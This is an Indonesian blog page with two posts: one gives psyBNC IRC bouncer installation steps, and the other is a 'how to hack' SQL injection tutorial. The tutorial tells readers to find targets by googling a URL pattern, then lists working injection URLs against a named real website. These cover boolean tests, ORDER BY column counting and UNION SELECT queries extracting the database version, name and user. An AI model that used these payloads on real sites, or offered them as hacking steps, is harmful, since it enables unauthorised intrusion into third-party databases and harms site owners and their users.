Jumat, 28 Maret 2008

Cara Installasi psyBNC

Ditujukan buat anda-anda semua yang belum tau cara membuat psyBNC
apa itu psyBNC ?
psyBNC adalah sejenis aplikasi /program yang di install di dalam mesin komputer kita yang be operating system linux,windows, dll, sehingga NickName kita di MIRC akan tetap ada walaupun kita tidak online..

Berikut Langkah-langkah membuat psyBNC untuk operating system Linux :

1. Cari Source/File Psybnc
di : www.psybnc.net
2. download source/file psybnc :
cth : wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
3. Setelah kita mendownload source/file tadi, lakukan extrak terhadap file psyBNC-2.3.2-7.tar.gz
caranya : tar -zvxf psyBNC-2.3.2-7.tar.gz
4. Setelah proses ekstrak selesai, masuk ke direktory psybnc nya..
cara nya : cd psybnc
5. Setelah masuk ke direktory psybnc, lakukan proses compile terhadap source/file nya tadi
cara nya : make
6. setelah compile nya selesai, lakukan pengeeditan untuk config psybnc nya, dimana config psybnc tersebut
terdapat beberapa contoh, misal :
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
dimana Port default psybnc itu 31337, kita bisa mengedit nya..terserah apa yang kita inginkan..misal nya 2006 atau yang lain.
untuk melakukan pengeditan ini, kita bisa menggunakan editor di linux, seperti “vi” “pico”
cth: pico psybnc.conf
untuk keluar dari editor pico, tekan ctrl+x dan jangan lupa men save apa yang sudah kita edit tadi….
7. Setelah editing selesai, kita bisa jalankan program psybnc nya…
caranya : ./psybnc

hasil nya :

.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ \ \/ / | o || \| || ,–’
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.2-7 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 2006
psyBNC2.3.2-7-cBtITLdDMSNpE started (PID 99986)

Oke…dech…selamat mencoba..!!

Minggu, 02 Maret 2008

Cara Hacking Dengan Sql Injection

[x] Apa itu SQL injection?

SQL injection adalah teknik eksploitasi database via remote.
dengan menggunakan SQL Query [perintah2 SQL] kita bisa mengetahui isi dari database target.
lebih lanjut bisa dibaca disini http://en.wikipedia.org/wiki/SQL_injection
cape ngejelasin ne.. panjang amit. :)


[x] Bagaimana cara mendeteksi SQL Injection pada sebuah site?

ada banyak cara untuk mendeteksi SQL Injection pada sebuah site.
salah satunya adalah dengan menggunakan command AND 1=1 dan AND 1=2
AND 1=1 <=- keadaan TRUE
AND 1=2 <=- keadaan FALSE
masih banyak cara2 yang lain untuk mendeteksi SQL Injection, dalam tutor ini gw hanya menggunakan cara ini.
langsung contoh target ajah ya...
googling dengan keyword "product_details.php?product_id="
nah pasti bakal keluar target2nya kan? kita ambil contoh target berikut.

http://www.ntlabs.co.uk/product_details.php?product_id=17

sekarang kita akan mencoba mendeteksi SQL Injection pada target diatas dengan menggunakan command2 tadi.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=1
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=2

apa perbedaan antara URL pertama dan URL kedua?
dalam kondisi AND 1=1 [TRUE] halaman sitenya tidak akan mengalami perubahan sedangkan
dalam kondisi AND 1=2 [FALSE] halaman sitenya pasti akan berubah, baik itu ada pesan error ataupun tidak.
ini berarti site tersebut bisa kita eksploitasi dengan menggunakan SQL Injection.


[x] Bagaimana mencari jumlah TABLE dalam database?

ada banyak cara juga dalam mencari jumlah TABLE dalam database target, dalam tutor ini gw make command ORDER BY.
angka dibelakang comamand ORDER BY adalah jumlah TABLE, kita mulai dengan angka 1.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 1/*

setelah dirun ternyata halamannya tidak ada perubahan atau halamannya masih dalam kondisi TRUE, itu berarti TABLE lebih dari 1.
langsung ke angka 10 ajah biar cepet. :)

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 10/*

apa yang terjadi? ternyata halamannya berubah atau halaman sudah dalam kondisi FALSE, berarti TABLE tidak lebih dari 10.
jadi range TABLE dalam databasenya adalah dari 1 - 10.
sekarang kita turunin angkanya jadi 9.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 9/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 8/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 7/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 6/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 5/*

ternyata masih FALSE juga, so kita turunin lagi angkanya sampai dapat kondisi TRUE

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 4/*

ternyata pada angka 4 halaman kembali pada kondisi TRUE. jadi bisa kita simpulkan bahwa ada 4 TABLE didalam database target.
koq bisa tau ada 4 TABLE sih? karena pada angka 4 kondisi halaman TRUE sedangkan pada angka 5 kondisi halaman sudah FALSE.
ga percaya? kita buktikan dengan menggunakan command UNION SELECT.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4,5/*

lagi2 kondisi TRUE pada URL pertama dan kondisi FALSE pada URL kedua.
benarkan? :p


[x] Magic number? [what the f*ck]

apa itu magic number?
magic number adalah angka2 yang akan keluar pada halaman site, angka2 ini akan dipakai untuk memasukkan SQL Query [perintah2 SQL]
bagaimana cara mengeluarkan magic numbernya?
caranya yaitu dengan menambahkan tanda - didepan angka setelah variabel. dalam tutor ini yaitu angka 17. [product_details.php?product_id=-17]

http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,3,4/*

angka2 berapa ajah yang keluar pada halaman site?
yup ada angka 2, 3 dan 4. jadi angka2 ini yang akan kita pakai untuk memasukkan SQL Query [perintah2 SQL].
misalnya untuk melihat versi dari database kita dapat menggunakan perintah version().

[1] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,version(),4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,database(),version(),user()/*

jadi magic number yang udah dikeluarin tadi diganti dengan perintah2 SQL. ngerti ora? xixixi...
kurang lebih seperti itu cara untuk mendeteksi SQL Injection Vulnerability pada sebuah site atau source.
any question? post comment atau googling ajah yak!! :)


Sumber bacaan : http://www.rajakoya.com